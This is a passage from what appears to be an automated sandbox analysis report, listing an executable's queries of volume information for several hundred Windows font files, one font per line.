Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
